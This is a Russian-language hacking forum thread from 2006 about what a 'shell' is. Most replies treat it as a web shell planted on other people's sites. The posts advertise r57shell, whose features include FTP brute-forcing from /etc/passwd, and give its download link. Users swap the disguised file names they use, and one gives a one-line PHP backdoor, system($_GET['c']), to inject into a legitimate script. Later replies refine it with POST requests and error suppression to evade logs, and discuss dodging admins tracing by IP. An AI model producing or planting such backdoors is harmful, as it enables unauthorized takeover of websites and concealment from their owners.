Обьясните ломаку, что такое Shell??

Discussion in 'PHP' started by S.H., 29 Jan 2006.

  1. S.H.

    S.H. New Member

    Joined:
    23 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Ну я понимаю для хака сайтов, но что это такое и с чем его едят....:-\ :confused:
     
  2. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    "Доступ в shell" - доступ к командной строке операционной системы UNIX, на которой размещен Ваш виртуальный сервер. Если Ваш тарифный план включает доступ в shell, вы можете попасть в него, соединившись с сервером www.ВАШ_ДОМЕН.ru (подставьте настоящее имя Вашего сайта по аналогии) по протоколу SSH с помощью программ SSH или OpenSSH. Под Windows протокол SSH поддерживают программы бесплатной Putty (последнюю версию можно свободно загрузить с ресурса www.chiark.greenend.org.uk). Получив доступ в shell, Вы можете выполнять редактирование и отладку Ваших страниц и скриптов прямо на виртуальном сервере."
     
  3. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    Шелл скрипт который позволяет управлять сайтом(возможно даже не своим).
    Т.е. создавать там файлы, кароче что-то типо проводника ,или файлового менеджера,в принципе что-то отдаленное, ну хз я незнаю как объяснить. Тебе наверное надо хоть раз его увидеть прежде понять что это такое
     
  4. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Что типа проводника в винде, только круче
    [​IMG]

    Новая версия r57shell 1.24
    В новой версии добавлено:
    ~ скачивание файлов с сервера на котором работает скрипт на локальный компьютер пользователя
    ~ поддержка архивирования передаваемого с сервера файла в zip, bzip или gzip
    ~ скачивание файлов с удаленного ftp сервера
    ~ отправка файлов на удаленный ftp сервер
    ~ брутфорс ftp сервера, в качестве логина и пароля используется имя пользователя из /etc/passwd
    ~ возможность использовать перевернутое (user -> resu) имя пользователя в качестве пароля при ftp-брутфорсе
    ~ вывод списка пользователей из /etc/passwd
    ~ отправка файлов аттачем на почту
    ~ отправка писем
    ~ свертывание/развертывание разделов

    http://rst.void.ru/download/r57shell.txt
     
    1 person likes this.
  5. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    #5 sssssssssssq, 29 Jan 2006
    Last edited: 29 Jan 2006
  6. S.H.

    S.H. New Member

    Joined:
    23 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    =-O ЁПТ!!!! Этож на какое разрешение сделано?????? :eek: :eek: :eek:
    А вообще я теперь всё понял!!! Всем спасибо...и ещё одно, если админ найдёт shell, то он его удалит, да?
     
  7. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    а вот интересно какое имя вы даете залитому шелу , я обычно img )) или как у •••™NO FEAR™••• conf.php ))
    ----------
    он попытается тебя найти первым делом))
     
  8. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,055
    Likes Received:
    1,532
    Reputations:
    1,128
    естественно удалит. Это вообще-то противозаконно :rolleyes:
     
  9. TTyck

    TTyck Elder - Старейшина

    Joined:
    12 Nov 2005
    Messages:
    91
    Likes Received:
    41
    Reputations:
    11
    я view.php всегда даю имя
     
  10. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Самый лучший способ - прописать в начало какого-то скрипта реального, вроде viewtopic.php код вроде такого:
    if (isset( $_GET["c"] )) { print "<pre>"; system( $_GET['c'] ); print "</pre>"; }
     
  11. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,055
    Likes Received:
    1,532
    Reputations:
    1,128
    А не через POST? =)
    Get в логах будет светиться)

    Ребят.. ну вы даете!!! При первой же возможности выдали названия своих шеллов! Ща какой-нить умник введет в гугл запрос с этими именами и плакали ваши шеллы..
     
  12. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,548
    Likes Received:
    1,397
    Reputations:
    612
    название шеллов не секрет ни для кого,какие они должы быть.
    и стратегически важные объекты, естесвенно запоролены =))
     
  13. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Да это вообщето не мой, это с сайта одного. А названия, ну в папки то всё время разные заливаешь. Вот и названия разные всё время, чтобы имена сливались.
    А по стандартным названиям в гугле конечно много можно найти.
     
  14. S.H.

    S.H. New Member

    Joined:
    23 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    И как он находит? Не по IP или по нему?
     
  15. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    КОго находит? Что за бред ты пишешь?
     
  16. S.H.

    S.H. New Member

    Joined:
    23 Jan 2006
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Не бред! Мне сказали, что админ пытается найти того, кто ему на сайт залил шелл, ну я и спрашиваю как он будет искать!!!
     
  17. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    2 S.H. Ну всё что может быть у админа это твой ИП (или не твой, если ты об этом позаботился). Ну и ещё логи сайта, где иногда можно увидеть с какого сайта ты залил шелл. Всмысле твой сайт узнать.

    Просто за залитый шелл он наврядли будет тебя искать, если он не админ Пентагона. Плюс информация об ИП может даваться провайдером только правоохранительным органам, а не всем админам.
     
    #17 Azazel, 29 Jan 2006
    Last edited: 30 Jan 2006
  18. gazta

    gazta Elder - Старейшина

    Joined:
    16 Oct 2005
    Messages:
    35
    Likes Received:
    3
    Reputations:
    -1
    А мне один раз регразили что передадут инфо обомне в управление "К"

    я чють в штаны не наделал неделю в инет не лазил. Но оказалась просто запугали, действено
     
  19. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    а ещё лутьше куданить поглубже в старый код и метод пост, и собачку перед system на всяк случай
     
    #19 ShAnKaR, 30 Jan 2006
    Last edited: 30 Jan 2006
  20. ZeV$

    ZeV$ Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    40
    Likes Received:
    11
    Reputations:
    3
    по-моему самое простое объяснение шелла -
    удаленное управление каким-либо сервером
    а лучше зарегить бесплатный шелл и полазить тама
     
    1 person likes this.